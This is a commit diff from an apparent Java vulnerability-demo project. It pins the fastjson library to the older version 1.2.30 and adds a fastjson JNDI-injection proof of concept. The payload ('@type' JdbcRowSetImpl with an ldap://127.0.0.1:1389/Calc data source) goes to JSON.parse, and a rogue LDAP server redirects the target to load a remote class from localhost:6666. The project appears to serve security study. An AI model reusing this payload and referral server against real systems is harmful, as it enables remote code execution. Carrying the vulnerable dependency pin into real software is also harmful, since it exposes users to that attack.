SummerSec
diff --git a/‎vuldemo/.idea/workspace.xml‎
Lines changed: 48 additions & 27 deletions b/‎vuldemo/.idea/workspace.xml‎
Lines changed: 48 additions & 27 deletions
diff --git a/‎vuldemo/pom.xml‎
Lines changed: 1 addition & 1 deletion b/‎vuldemo/pom.xml‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎vuldemo/src/main/java/vul/fastjson/fastjson1224.java‎
Lines changed: 2 additions & 2 deletions b/‎vuldemo/src/main/java/vul/fastjson/fastjson1224.java‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎vuldemo/src/main/java/vul/util/Reflections.java‎
Lines changed: 3 additions & 0 deletions b/‎vuldemo/src/main/java/vul/util/Reflections.java‎
Lines changed: 3 additions & 0 deletions
diff --git a/‎vuldemo/src/main/java/vul/util/ldapserver.java‎
Lines changed: 1 addition & 1 deletion b/‎vuldemo/src/main/java/vul/util/ldapserver.java‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎vuldemo/target/classes/vul/ccbug/cc5.class‎
0 Bytes b/‎vuldemo/target/classes/vul/ccbug/cc5.class‎
0 Bytes
diff --git a/‎vuldemo/target/classes/vul/util/Reflections.class‎
38 Bytes b/‎vuldemo/target/classes/vul/util/Reflections.class‎
38 Bytes
diff --git a/‎vuldemo/vuldemo.iml‎
Lines changed: 1 addition & 1 deletion b/‎vuldemo/vuldemo.iml‎
Lines changed: 1 addition & 1 deletion
@@ -50,7 +50,7 @@
         <dependency>
             <groupId>com.alibaba</groupId>
             <artifactId>fastjson</artifactId>
-            <version>1.2.47</version>
+            <version>1.2.30</version>
         </dependency>
         <dependency>
             <groupId>com.unboundid</groupId>
 
@@ -34,8 +34,8 @@ public static void main(String[] args) {
 
                 "\"dataSourceName\":\"ldap://127.0.0.1:1389/Weblogicpoc\",\"autoCommit\":true}";
 //                "\"dataSourceName\":\"rmi://localhost:1090/Exploit\",\"autoCommit\":true}";
-
-        JSON.parse(payload);
+        String poc = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1389/Calc\",\"autoCommit\":true}";
+        JSON.parse(poc);
 
 //        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
 //        try {
 
@@ -12,6 +12,9 @@
 @SuppressWarnings ( "restriction" )
 public class Reflections {
 
+    public Reflections(String name) {
+    }
+
     public static void setAccessible(AccessibleObject member) {
         // quiet runtime warnings from JDK9+
         Permit.setAccessible(member);
 
@@ -35,7 +35,7 @@ public static void main ( String[] args ) {
 
         try {
             //  URL地址可以修改成任意地址
-            URL url = new URL("http://localhost:8080/#Exploit");
+            URL url = new URL("http://localhost:6666/#Calc");
             InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
             config.setListenerConfigs(new InMemoryListenerConfig(
                     "listen", //$NON-NLS-1$
 
@@ -28,7 +28,7 @@
     <orderEntry type="library" name="Maven: org.apache.commons:commons-collections4:4.0" level="project" />
     <orderEntry type="library" name="Maven: com.nqzero:permit-reflect:0.3" level="project" />
     <orderEntry type="library" name="Maven: javassist:javassist:3.12.0.GA" level="project" />
-    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.47" level="project" />
+    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.30" level="project" />
     <orderEntry type="library" name="Maven: com.unboundid:unboundid-ldapsdk:3.1.1" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.10.0" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.10.0" level="project" />